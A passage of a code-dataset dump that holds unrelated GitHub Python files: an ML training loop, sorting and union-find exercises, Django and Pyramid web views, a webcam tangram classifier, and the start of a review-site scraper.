num_epochs+1):\n\n losses = AverageMeter()\n accuracies = AverageMeter()\n model.train()\n\n print(f'Starting training on epoch {epoch} / {num_epochs}')\n\n all_targets_list = []\n\n for i, (inputs, targets) in enumerate(train_loader):\n inputs, targets = inputs.to(device), targets.long().to(device)\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n \n all_targets_list.append(targets)\n acc = calculate_accuracy(outputs, targets)\n\n losses.update(loss.item(), inputs.size(0))\n accuracies.update(acc, inputs.size(0))\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n scheduler.step()\n \n if i % 30 == 0:\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Acc {acc.val:.3f} ({acc.avg:.3f})'.format(epoch, i + 1, len(train_loader), loss=losses, acc=accuracies))\n \n all_targets = torch.cat(all_targets_list, dim=0).tolist()\n calculate_class_num(all_targets, label_dict, 'train')\n\n if epoch % 5 == 0:\n save_checkpoint(cfg.TRAIN.CHECKPOINT_PATH, epoch, model, optimizer)\n\n lr = scheduler.get_last_lr()[0]\n print('Epoch: {0}\\t'\n 'Lr: {1}\\t'\n 'Train Loss {2}\\t'\n 'Train Acc {3}'.format(epoch, lr, losses.avg, accuracies.avg))\n\n test_acc = test(model, test_loader, device, label_dict)\n if test_acc > best_test_acc:\n best_test_acc = test_acc\n best_epoch = epoch\n print(\"save best checkpoint\")\n print('------------------------------------------------------------')\n save_checkpoint(cfg.TRAIN.CHECKPOINT_PATH, epoch, model, optimizer, \"best\")\n \n print('best epoch: {}, best test acc: {}'.format(best_epoch, best_test_acc))\n\n\ndef val(epoch, model, criterion, dataloader, device):\n\n print('validation at epoch {}'.format(epoch))\n\n losses = AverageMeter()\n accuracies = AverageMeter()\n\n model.eval()\n\n with torch.no_grad():\n for _, (inputs, targets) in enumerate(dataloader):\n inputs, targets = inputs.to(device), targets.long().to(device)\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n acc = calculate_accuracy(outputs, targets)\n losses.update(loss.item(), inputs.size(0))\n accuracies.update(acc, inputs.size(0))\n\n print('Epoch: {0}\\t'\n 'Val Loss {1}\\t'\n 'Val Acc {2}'.format(epoch, losses.avg, accuracies.avg))\n\n\ndef test(model, dataloader, device, label_dict):\n accuracies = AverageMeter()\n accuracies_top3 = AverageMeter()\n\n model.eval()\n all_targets_list = []\n all_outputs_list = []\n\n with torch.no_grad():\n for _, (inputs, targets) in enumerate(dataloader):\n inputs, targets = inputs.to(device), targets.long().to(device)\n outputs = model(inputs)\n acc = calculate_accuracy(outputs, targets)\n acc3 = calculate_accuracy(outputs, targets, topk=3)\n accuracies.update(acc, inputs.size(0))\n accuracies_top3.update(acc3, inputs.size(0))\n all_targets_list.append(targets)\n all_outputs_list.append(outputs)\n \n all_targets = torch.cat(all_targets_list, dim=0).tolist()\n all_scores = torch.cat(all_outputs_list, dim=0)\n all_outputs = torch.argmax(all_scores, dim=1).tolist()\n calculate_class_num(all_targets, label_dict, 'test')\n plot_confusion_matrix(all_targets, all_outputs, label_dict)\n plot_roc_curve(all_targets, all_scores, label_dict)\n \n print(f'Test Top1 Acc: {accuracies.avg}, Test Top3 Acc: {accuracies_top3.avg}')\n print('------------------------------------------------------------')\n return accuracies.avg\n","repo_name":"ddz16/video-classification","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"515303403","text":"#通过一趟排序将要排序的数据分割成独立的两部分,其中一部分的所有数据都比另外一部分的所有数据都要小,\n# 然后再按此方法对这两部分数据分别进行快速排序,整个排序过程可以递归进行,以此达到整个数据变成有序序列。\n\nlist=[2,-4,699,23,1,-9,6,7,88] #mid=23 left=[2,-4,1,-9,6,7] 23 right=[699,88]\n# firstTime=[2,-4,1,-9,6,7] + [23] + [699,88]\n# secondTime=[-4,-9] + [1] + [2,6,7] + [23] + [88, 699]\n# thirdTime=[-9,-4,1,2,6,7,23,88,699]\ndef quickSort(list):\n if len(list) >=2:\n mid=list[len(list)//2]\n left, right=[],[]\n list.remove(mid)\n for num in list:\n if num >mid:\n right.append(num)\n else:\n left.append(num)\n return quickSort(left) + [mid] + quickSort(right)\n else:\n return list\n\n\nprint(quickSort(list))\n\n","repo_name":"sammazhao/moocClassSelenium","sub_path":"QuikSortDemo.py","file_name":"QuikSortDemo.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19478194783","text":"import sys\n\n\ninput = lambda : sys.stdin.readline().rstrip()\n\ndef solution():\n def find(num):\n if parent[num] < 0:\n return num\n\n parent[num] = find(parent[num])\n return parent[num]\n\n def union(a, b):\n parent_a = find(a)\n parent_b = find(b)\n if parent_a == parent_b:\n return\n\n if parent[parent_a] < parent[parent_b]:\n\n parent[parent_b] = parent_a\n elif parent[parent_a] > parent[parent_b]:\n parent[parent_a] = parent_b\n else:\n parent[parent_a] -= 1\n parent[parent_b] = parent_a\n\n n, m = map(int, input().split())\n parent = [-1] * (n + 1)\n\n answer = []\n\n for _ in range(m):\n command, a, b = map(int, input().split())\n if command:\n if find(a) == find(b):\n answer.append('YES')\n else:\n answer.append('NO')\n else:\n union(a, b)\n\n return '\\n'.join(answer)\n\n\nprint(solution())","repo_name":"UntitledCrew/Weekly","sub_path":"2021_year/1_month/5_week/Soomin/Algorithm/1717_집합의_표현.py","file_name":"1717_집합의_표현.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"5838999008","text":"import tkinter as tk\nfrom tkinter import messagebox\nfrom theme import Theme\nfrom tooltip import CreateTooltip\n\nclass CreateFloatInput(object):\n \"\"\"Creates labels and entries for defining a float\"\"\"\n\n def __init__(self, root, theme, label_text, vertical_offset = 0, tooltip_text = \"\", default_entry = 0):\n # Root\n self.root = root\n \n # Theme\n self.theme = theme\n\n # Vertical offset\n self.vertical_offset = vertical_offset\n\n # Default entry\n self.default_entry = default_entry\n\n # Header\n label = tk.Label(root, text = label_text, foreground = self.theme.foreground, background = self.theme.background, font = self.theme.font)\n self.label_x = 20\n self.label_y = vertical_offset\n self.label_height = 20\n label.place(x = self.label_x, y = self.label_y, height = self.label_height)\n self.label = label\n\n if (tooltip_text != \"\"):\n tooltip = CreateTooltip(label, tooltip_text)\n\n # Create entry\n entry = tk.Entry(self.root, background = self.theme.background, foreground = self.theme.foreground, font = self.theme.font, insertbackground = self.theme.foreground)\n entry.insert(2, self.default_entry)\n self.entry_x = 190\n self.entry_y = vertical_offset\n self.entry_height = 20\n entry.place(x = self.entry_x, y = self.entry_y, height = self.entry_height, width = 60)\n self.entry = entry\n\n def show(self):\n self.label.place(x = self.label_x, y = self.label_y, height = self.label_height)\n self.entry.place(x = self.entry_x, y = self.entry_y, height = self.entry_height)\n\n def hide(self):\n self.label.place(x = 0, y = 0, height = 0)\n self.entry.place(x = 0, y = 0, height = 0)\n\n def getentry(self):\n entry = None\n try:\n entry = float(self.entry.get())\n except:\n messagebox.showerror(\"Invalid Input\", \"Ensure inputs are valid\")\n return entry\n ","repo_name":"joebinns/vector-field-generator","sub_path":"floatinput.py","file_name":"floatinput.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"71871098452","text":"\"\"\"\n本文件中存放leetcode《剑指Offer》题目\n\"\"\"\nfrom datastructure import *\n\n\ndef getIntersectionNode(headA: ListNode, headB: ListNode) -> ListNode:\n \"\"\"\n 剑指Offer 52 输入两个链表,找到它们的第一个公共子节点,没有的话返回null \\n\n 关键词:双指针 路径长度相同 同时为None\n \"\"\"\n p1, p2 = headA, headB\n\n # 妙啊,如果没有相遇的话大家都是None\n while p1 != p2:\n p1 = p1.next if p1 else headB\n p2 = p2.next if p2 else headA\n\n return p1\n\n\ndef search(nums, target):\n \"\"\"\n 剑指Offer 53 统计一个数字在排序数组中出现的次数\n \"\"\"\n cnt = 0\n for e in nums:\n if e == target:\n cnt += 1\n return cnt","repo_name":"CSU-NXY/leetcode_py","sub_path":"offer.py","file_name":"offer.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"36517693115","text":"\"\"\"sistemaGestionRoyal URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import url, include \nfrom rest_framework import routers # add this\nfrom sistema import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n#router = routers.DefaultRouter() # add this\n#router.register(r'Alumnos', views.AlumnoSerializer, 'Alumnos') \n\nurlpatterns = [\n url(r'^', include('sistema.urls')),#las apis\n path('admin/', admin.site.urls),\n path('', views.inicio, name='inicio'),\n path('logout', views.logoutUser, name='logout'),\n path('home/', views.base, name='home'),\n path('consulta_a/', views.consultar_a, name='consultar_a'),\n path('royalApp/', views.royalAppPassword, name='royalApp'),\n path('royalApp/', views.modalAlumnos, name='royalApp'),\n path('consulta_a/', views.modalAlumnos),\n path('consulta_d/', views.consultar_d, name='consultar_d'),\n path('consulta_d/', views.modalDocentes),\n path('certificados/', views.certificados, name='certificados'),\n path('certificados//', views.modalcertificadoscombos),\n path('certificados/eliminar/', views.modalcertificados),\n path('curso/', views.curso, name='cursos'),\n path('curso//', views.modalCursos),\n path('aula/', views.aula, name='aula'),\n path('aula//', views.modalAulas),\n path('grupos/', views.grupos, name='grupos'),\n path('grupos//', views.modalgrupos),\n path('grupos////', views.moverAlumnos),\n path('gruposAulas////', views.moverAulas),\n path('pagos/', views.pagos, name='pagos'),\n path('pagos//', views.modalPagos),\n path('registro/', views.modalPagos),\n path('registro//', views.modalPagos),\n path('promociones/', views.promociones, name='promociones'),\n path('promociones//', views.modalpromociones),\n path('pagos_d/', views.pagos_d, name='pagos_d'),\n path('pagos_d//', views.modalPagosD),\n path('ventas/', views.ventas, name='ventas'),\n path('libros/', views.libros, name='libros'),\n path('libros//', views.modalLibros),\n path('inventario/', views.inventario, name='inventario'),\n path('inventario//', views.modalProducto),\n path('caja/', views.caja, name='caja'),\n path('cajacierre/', views.cajacierre, name='cajacierre'),\n path('historialVentas/', views.historialVentas, name='historialVentas'),\n path('caja//', views.modalDetalleVenta)\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL,document_root=settings.STATIC_ROOT)","repo_name":"ReynosoJesus/SistemaRoyal","sub_path":"sistemaGestionRoyal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13217507611","text":"from pyramid.view import view_config, view_defaults\nfrom stalker import Department\n\nimport logging\n\nfrom stalker_pyramid.views.entity import EntityViews, simple_entity_interpreter\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.WARNING)\n\n\n# @view_config(\n# route_name='create_department'\n# )\n# def create_department(request):\n# \"\"\"creates a new Department\n# \"\"\"\n#\n# logger.debug('***create department method starts ***')\n#\n# logged_in_user = get_logged_in_user(request)\n#\n# # get params\n# came_from = request.params.get('came_from', '/')\n# name = request.params.get('name')\n#\n# logger.debug('new department name : %s' % name)\n#\n# if name:\n# description = request.params.get('description')\n#\n# lead_id = request.params.get('lead_id', -1)\n# lead = User.query.filter_by(id=lead_id).first()\n#\n# # Tags\n# tags = get_tags(request)\n#\n# logger.debug('new department description : %s' % description)\n# logger.debug('new department lead : %s' % lead)\n# logger.debug('new department tags : %s' % tags)\n#\n# try:\n# new_department = Department(\n# name=name,\n# description=description,\n# created_by=logged_in_user,\n# tags=tags\n# )\n#\n# # create a new Department_User with lead role\n# lead_role = query_role('Lead')\n# dpu = DepartmentUser(\n# department=new_department,\n# user=lead,\n# role=lead_role\n# )\n#\n# DBSession.add(new_department)\n# DBSession.add(dpu)\n#\n# logger.debug('added new department successfully!')\n#\n# request.session.flash(\n# 'success:Department %s is created '\n# 'successfully!' % name\n# )\n#\n# logger.debug('***create department method ends ***')\n#\n# except BaseException as e:\n# request.session.flash('error: %s' % e)\n# HTTPFound(location=came_from)\n# else:\n# logger.debug('not all parameters are in request.params')\n# log_param(request, 'name')\n# response = Response(\n# 'There are missing parameters: '\n# 'name: %s' % name, 500\n# )\n# transaction.abort()\n# return response\n#\n# response = Response('successfully created %s department!' % name)\n# return response\n#\n#\n# @view_config(\n# route_name='update_department'\n# )\n# def update_department(request):\n# \"\"\"updates an Department\n# \"\"\"\n#\n# logger.debug('***update department method starts ***')\n#\n# logged_in_user = get_logged_in_user(request)\n#\n# # get params\n# came_from = request.params.get('came_from', '/')\n# department_id = request.matchdict.get('id', -1)\n# department = Department.query.filter_by(id=department_id).first()\n#\n# name = request.params.get('name')\n#\n# logger.debug('department : %s' % department)\n# logger.debug('department new name : %s' % name)\n#\n# if department and name:\n#\n# description = request.params.get('description')\n#\n# lead_id = request.params.get('lead_id', -1)\n# lead = User.query.filter_by(id=lead_id).first()\n#\n# # Tags\n# tags = get_tags(request)\n#\n# logger.debug('department new description : %s' % description)\n# logger.debug('department new lead : %s' % lead)\n# logger.debug('department new tags : %s' % tags)\n#\n# # update the department\n# department.name = name\n# department.description = description\n#\n# department.lead = lead\n# lead_role = query_role('Lead')\n# # get the current department lead\n# dpu = DepartmentUser.query\\\n# .filter(DepartmentUser.department == department)\\\n# .filter(DepartmentUser.role == lead_role)\\\n# .first()\n# if not dpu:\n# dpu = DepartmentUser(\n# department=department,\n# user=lead,\n# role=lead_role\n# )\n# DBSession.add(dpu)\n# else:\n# dpu.user = lead\n#\n# department.tags = tags\n# department.updated_by = logged_in_user\n# department.date_updated = datetime.datetime.now()\n#\n# DBSession.add(department)\n#\n# logger.debug('department is updated successfully')\n#\n# request.session.flash(\n# 'success:Department %s '\n# 'is updated successfully' % name\n# )\n#\n# logger.debug('***update department method ends ***')\n# else:\n# logger.debug('not all parameters are in request.params')\n# log_param(request, 'department_id')\n# log_param(request, 'name')\n# HTTPServerError()\n#\n# return Response('Successfully updated department: %s' % department_id)\n#\n#\n# @view_config(\n# route_name='get_departments',\n# renderer='json'\n# )\n# def get_departments(request):\n# \"\"\"returns all the departments in the database\n# \"\"\"\n# return [\n# {\n# 'id': dep.id,\n# 'name': dep.name\n# }\n# for dep in Department.query.order_by(Department.name.asc()).all()\n# ]\n#\n#\n# @view_config(\n# route_name='get_department',\n# renderer='json'\n# )\n# def get_department(request):\n# \"\"\"returns all the departments in the database\n# \"\"\"\n# department_id = request.matchdict.get('id', -1)\n# department = Department.query.filter_by(id=department_id).first()\n#\n# return[\n# {\n# 'id': department.id,\n# 'name': department.name,\n# 'thumbnail_full_path': department.thumbnail.full_path if department.thumbnail else None,\n# }\n# ]\n#\n#\n# @view_config(\n# route_name='get_departments',\n# renderer='json'\n# )\n# def get_departments(request):\n# \"\"\"returns all the departments in the database\n# \"\"\"\n# sql_query = \"\"\"select\n# \"SimpleEntities\".id\n# \"SimpleEntities\".name\n# from \"Departments\"\n# join \"SimpleEntities\" on \"Departments\".id = \"SimpleEntities\".id\n# order by \"SimpleEntities\".name\n# \"\"\"\n#\n# result = DBSession.connection().execute(sql_query)\n#\n# return [\n# {\n# 'id': r[0],\n# 'name': r[1]\n# }\n# for r in result.fetchall()\n# ]\n#\n#\n# @view_config(\n# route_name='delete_department',\n# permission='Delete_Department'\n# )\n# def delete_department(request):\n# \"\"\"deletes the department with the given id\n# \"\"\"\n# department_id = request.matchdict.get('id')\n# department = Department.query.get(department_id)\n# name = department.name\n#\n# if not department:\n# transaction.abort()\n# return Response(\n# 'Can not find a Department with id: %s' % department_id, 500\n# )\n#\n# try:\n# DBSession.delete(department)\n# transaction.commit()\n# except Exception as e:\n# transaction.abort()\n# c = StdErrToHTMLConverter(e)\n# transaction.abort()\n# return Response(c.html(), 500)\n#\n# request.session.flash(\n# 'success: %s Department is deleted '\n# 'successfully' % name\n# )\n#\n# return Response('Successfully deleted department: %s' % department_id)\n\n\n@view_defaults(renderer='json')\nclass DepartmentViews(EntityViews):\n \"\"\"views for Department instances\n \"\"\"\n som_class = Department\n local_params = [\n {\n 'param_name': 'user_id',\n 'arg_name': 'users',\n 'is_list': True,\n 'interpreter': simple_entity_interpreter\n },\n ]\n\n @view_config(\n route_name='department',\n request_method='GET'\n )\n def get_entity(self):\n \"\"\"returns one Department instance data as JSON\n \"\"\"\n response = super(DepartmentViews, self).get_entity()\n\n # get entity type\n from stalker import SimpleEntity\n from stalker.db.session import DBSession\n entity_type = DBSession.query(SimpleEntity.entity_type)\\\n .filter(SimpleEntity.id == self.entity_id)\\\n .first()[0]\n\n # get user count\n from stalker import DepartmentUser\n user_count = DBSession\\\n .query(DepartmentUser.user_id)\\\n .filter(DepartmentUser.department_id == self.entity_id)\\\n .count()\n\n from stalker_pyramid import entity_type_to_url\n data = {\n 'user_roles': {\n '$ref': '%s/%s/user_roles' %\n (entity_type_to_url[entity_type], self.entity_id),\n 'length': user_count\n },\n 'users': {\n '$ref': '%s/%s/users' %\n (entity_type_to_url[entity_type], self.entity_id),\n 'length': user_count\n }\n }\n\n return self.update_response_data(response, data)\n\n @view_config(\n route_name='departments',\n request_method='GET'\n )\n def get_entities(self):\n \"\"\"returns all Department instances\n \"\"\"\n return super(DepartmentViews, self).get_entities()\n\n @view_config(\n route_name='department',\n request_method=['PATCH', 'POST']\n )\n def update_entity(self):\n \"\"\"updates a Department instance\n \"\"\"\n return super(DepartmentViews, self).update_entity()\n\n @view_config(\n route_name='departments',\n request_method='PUT'\n )\n def create_entity(self):\n \"\"\"creates a Department instance\n \"\"\"\n return super(DepartmentViews, self).create_entity()\n\n @view_config(\n route_name='department',\n request_method='DELETE'\n )\n def delete_entity(self):\n \"\"\"deletes a Department instance\n \"\"\"\n return super(DepartmentViews, self).delete_entity()\n\n @view_config(\n route_name='department_users',\n request_method='GET'\n )\n def get_users(self):\n \"\"\"returns department users as JSON data\n # \"\"\"\n from stalker import DepartmentUser, User\n join = User, DepartmentUser.user\n filters = [DepartmentUser.department_id == self.entity_id]\n filters.extend(self.filter_generator(User))\n return self.collection_query(User, join=join, filters=filters)\n\n @view_config(\n route_name='department_users',\n request_method=['PATCH', 'POST']\n )\n def update_users(self):\n \"\"\"updates Department.users\n \"\"\"\n # get user ids\n user_ids = self.get_multi_integer(self.request, 'user_id')\n from stalker import User\n users = User.query.filter(User.id.in_(user_ids)).all()\n\n from stalker.db.session import DBSession\n if self.request.method == 'PATCH':\n with DBSession.no_autoflush:\n self.entity.users += users\n elif self.request.method == 'POST':\n with DBSession.no_autoflush:\n self.entity.users = users\n\n @view_config(\n route_name='department_users',\n request_method='DELETE'\n )\n def remove_users(self):\n \"\"\"removes users from Department.users attribute\n \"\"\"\n # get user ids\n user_ids = self.get_multi_integer(self.request, 'user_id')\n from stalker import User\n users = User.query.filter(User.id.in_(user_ids)).all()\n\n from stalker.db.session import DBSession\n with DBSession.no_autoflush:\n for user in users:\n try:\n self.entity.users.remove(user)\n except ValueError:\n pass\n\n DBSession.flush()\n\n @view_config(\n route_name='department_user_roles',\n request_method='GET'\n )\n def get_user_roles(self):\n \"\"\"returns department users as JSON data\n \"\"\"\n sql = \"\"\"\n select\n user_se.id,\n user_se.name,\n user_se.entity_type,\n\n role_se.id,\n role_se.name,\n role_se.entity_type\n from \"Department_Users\" as du\n join \"SimpleEntities\" as user_se on du.uid = user_se.id\n left outer join \"SimpleEntities\" as role_se on du.rid = role_se.id\n where du.did = :id\n \"\"\"\n from sqlalchemy import text\n from stalker.db.session import DBSession\n conn = DBSession.connection()\n result = conn.execute(text(sql), id=self.entity_id).fetchall()\n\n from stalker_pyramid import entity_type_to_url\n data = [{\n 'user': {\n 'id': r[0],\n 'name': r[1],\n 'entity_type': r[2],\n '$ref': '%s/%s' % (entity_type_to_url[r[2]], r[0])\n },\n 'role': {\n 'id': r[3],\n 'name': r[4],\n 'entity_type': r[5],\n '$ref': '%s/%s' % (entity_type_to_url[r[5]], r[3])\n } if r[3] else None\n } for r in result]\n\n from pyramid.response import Response\n return Response(\n json_body=data,\n status=200\n )\n\n @view_config(\n route_name='department_user_roles',\n request_method=['PATCH', 'POST']\n )\n def update_user_role(self):\n \"\"\"updates user roles\n \"\"\"\n # get parameters\n user_role_ids = self.request.params.getall('user_role')\n\n from stalker import DepartmentUser\n for user_role_id in user_role_ids:\n user_id, role_id = user_role_id.split(',')\n\n department_user = DepartmentUser.query\\\n .filter(DepartmentUser.department_id == self.entity_id)\\\n .filter(DepartmentUser.user_id == user_id)\\\n .first()\n\n if department_user:\n department_user.role_id = role_id\n\n @view_config(\n route_name='department_user_roles',\n request_method='DELETE'\n )\n def remove_user_role(self):\n \"\"\"removes user roles\n \"\"\"\n # get parameters\n user_ids = map(int, self.request.params.getall('user_id'))\n\n from stalker import DepartmentUser\n for user_id in user_ids:\n department_user = DepartmentUser.query\\\n .filter(DepartmentUser.department_id == self.entity_id)\\\n .filter(DepartmentUser.user_id == user_id)\\\n .first()\n\n if department_user:\n department_user.role_id = None\n\n","repo_name":"eoyilmaz/stalker_pyramid2","sub_path":"stalker_pyramid/views/department.py","file_name":"department.py","file_ext":"py","file_size_in_byte":14522,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"8457905076","text":"\"\"\"\nTakes a shot every second and splits it in two. Saves the result in a \nfolder called 'frames'.\n\nTo quit camera mode, press ESC\n\"\"\"\n\nimport cv2\nimport os\nimport time\nimport shutil\nimport tensorflow as tf\nimport pandas as pd\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.models import load_model\n\n#labels = {0: 'bateau', 1: 'bol', 2: 'chat', 3: 'coeur', 4: 'cygne', 5: 'lapin', 6: 'maison', 7: 'marteau', 8: 'montagne', 9: 'pont', 10: 'renard', 11: 'tortue'}\n\nlabels = ['bateau', 'bol', 'chat', 'coeur', 'cygne', 'lapin', 'maison', 'marteau', 'montagne', 'pont', 'renard', 'tortue']\n# Must import model.h5 as model\n\nmodel_path = \"tangram_jason_mobilenetv2.h5\"\nmodel = load_model(model_path)\n\n#Change to 1 to get webcam\ncam = cv2.VideoCapture(1)\n\ncv2.namedWindow(\"Camera Shot\")\n\nimg_counter = 0\n\nres_A = {label:[] for label in labels}\nres_B = {label:[] for label in labels}\n\nif not os.path.exists('frames/'):\n os.makedirs('frames/')\nelse:\n shutil.rmtree('frames/')\n os.makedirs('frames/')\n\nwhile True:\n start_time = time.time()\n ret, frame = cam.read()\n if not ret:\n print(\"failed to grab frame\")\n break\n cv2.imshow(\"Camera Shot\", frame)\n\n height, width, dim = frame.shape\n width_cutoff = width // 2\n s1 = frame[:, :width_cutoff]\n s2 = frame[:, width_cutoff:]\n\n # Resize image to expected size for the model and expansion of dimension from 3 to 4\n dim = (224, 224)\n # s1_up = tf.image.resize(s1/255, (224,224), preserve_aspect_ratio=False)\n s1_up = cv2.resize(s1/255, dim)\n # s1_final = tf.expand_dims(s1_up, axis=0)\n s1_final = s1_up.reshape(1, s1_up.shape[0], s1_up.shape[1], s1_up.shape[2])\n # s2_up = tf.image.resize(s2, (224,224), preserve_aspect_ratio=False)\n s2_up = cv2.resize(s2/255, dim)\n # s2_final = tf.expand_dims(s2_up, axis=0)\n s2_final = s2_up.reshape(1, s2_up.shape[0], s2_up.shape[1], s2_up.shape[2])\n \n # Prediction and creation of results dictionnaries\n result_1 = model.predict(s1_final)\n result_2 = model.predict(s2_final)\n\n #best_result_A=labels[np.argmax(result_1[0])]\n #best_result_B=labels[np.argmax(result_2[0])]\n\n top_5_A = result_1[0].argsort()[::-1][:5]\n top_5_B = result_2[0].argsort()[::-1][:5]\n\n top_l_A = [labels[p] for p in top_5_A]\n top_l_B = [labels[p] for p in top_5_B]\n\n #Keep up for the dataframe\n for i, label in enumerate(labels):\n res_A[label].append(result_1[0][i])\n res_B[label].append(result_2[0][i])\n end_time = time.time()\n total_fps = 1/(end_time-start_time)\n print(\"Total time:\",end_time-start_time)\n print(\"FPS:\",total_fps, '\\n')\n\n print(\"Image A\")\n print(\"Best result: \", top_l_A[0], '\\n')\n print(\"Top 5:\")\n for i in range(1,5):\n print(i, \": \", top_l_A[i])\n print('\\n')\n print(\"Image B\")\n print(\"Best result: \", top_l_B[0], '\\n')\n print(\"Top 5:\")\n for i in range(1,5):\n print(i, \": \", top_l_B[i])\n print('\\n\\n')\n\n #Takes a shot every second\n img_name_A = \"frames/frame_{}-A.jpg\".format(img_counter)\n img_name_B = \"frames/frame_{}-B.jpg\".format(img_counter)\n cv2.imwrite(img_name_A, s1)\n cv2.imwrite(img_name_B, s2)\n print(\"{} written!\".format(img_name_A.replace(\"-A.jpg\",\"\")))\n \n img_counter += 1\n time.sleep(1)\n\n k = cv2.waitKey(1)\n if k%256 == 27:\n # ESC pressed\n print(\"Escape hit, closing...\")\n break\n \n\ncam.release()\n\ncv2.destroyAllWindows()\n\ndf_A = pd.DataFrame(res_A)\ndf_B = pd.DataFrame(res_B)\n\ndf_A.to_csv('results_A.csv')\ndf_B.to_csv('results_B.csv')\n\nshutil.make_archive('images', 'zip', 'frames/')","repo_name":"bintou579/Projet_detection_Tangram","sub_path":"modules/get_img_from_webcam.py","file_name":"get_img_from_webcam.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"15976627162","text":"\ndef is_beatiful(board,n, range_row, range_columns):\n for i in range(n):\n for j in range(n):\n current = board[i][j]\n range_row[current] +=1\n if range_row[current] != (i+1):\n return \"NO\"\n\n for i in range(n):\n for j in range(n):\n current = board[j][i]\n range_columns[current] +=1\n if range_columns [current] != (i+1):\n return \"NO\"\n \n return \"YES\"\n \n\ndef solve():\n n = int(input())\n _range = {}\n for i in range(1,n+1):\n _range.update({i:0})\n board = []\n for i in range(n):\n board.append(list(map(int,input().split())))\n \n print(is_beatiful(board,n, _range,_range.copy()))\n\n\n\n\nsolve()","repo_name":"TatoNaranjo/Codeforces-Solutions","sub_path":"Practice ICPC/F.py","file_name":"F.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"43242082484","text":"from torch import nn\nfrom torchvision import models\n\n\nclass Classifier(nn.Module):\n def __init__(self):\n super(Classifier, self).__init__()\n\n model_ft = models.resnet18()\n\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Sequential(\n nn.Dropout(0.6),\n nn.Linear(num_ftrs, 256),\n nn.Dropout(0.6),\n nn.Linear(256, 10)\n )\n\n self.layers = model_ft\n\n def forward(self, x):\n return self.layers(x)\n\n\n","repo_name":"rogierknoester/omniart_eye_classifier","sub_path":"omniart_eye_classifier/classifier_model.py","file_name":"classifier_model.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7728549161","text":"import pathlib\nimport phantomconfig as pc\nfrom .stub import test_data\n\n\ndef test_write_phantom_config():\n 'Test writing Phantom config files.'\n tmp_file = pathlib.Path('tmp.in')\n conf = pc.read_config(test_phantom_file)\n conf.write_phantom(tmp_file)\n conf = pc.read_config(tmp_file)\n assert (conf.config == test_data.config)\n assert (conf.header == test_data.header)\n assert (conf.datetime == test_data._datetime)\n tmp_file.unlink()\n","repo_name":"menna161/API-Wizard","sub_path":"PyAroma/datasets/datetime/snippets/snippet1232758.py","file_name":"snippet1232758.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15853218172","text":"import requests\nimport time\nimport csv\nfrom http.cookies import SimpleCookie\n\nurl = \"http://www.dianping.com/overseas/shop/ajax/allReview\"\nparams = {\n \"shopId\": \"\",\n \"cityId\": \"2311\", # Singapore\n \"categoryURLName\": \"food\",\n \"power\": \"5\",\n \"cityEnName\": \"singapore\",\n \"shopType\": \"10\",\n \"_token\": \"eJyNjVtPgzAAhf9Ln8naQrmUtzFkmQHcBkyjMYZt3ORWoBlM43+3i/jik8lJvpMvJzmfoN+cgYkRQgRLgA+iq4pMNU2XMUaKBE5/nG5I4NgfbGC+YCojiVD0ejN7IX4MRoZQv52ILhOR22ojRiDnnJkQjuO4OBdxw4omW5zaGg55yyClKlapAqR/zWCfXIpkfIurCjIMxEUdigvBcmY8k88ciqwBJkjupzAoyRBEytbVWs9O3SkwJp9HivuB6D4wyNA9hf4SPrge3AZ34+VaYNfKGGG8PK7z9rmz0qbqokeZ1b2zTktnZztugH07Qvzds5NyKOwD5tZytVtB39I98PUNR+5raQ==\"\n}\nheaders = {\n 'Accept': 'application/json, text/javascript, */*; q=0.01',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Cache-Control': 'no-cache',\n 'Connection': 'keep-alive',\n 'Host': 'www.dianping.com',\n 'Pragma': 'no-cache',\n 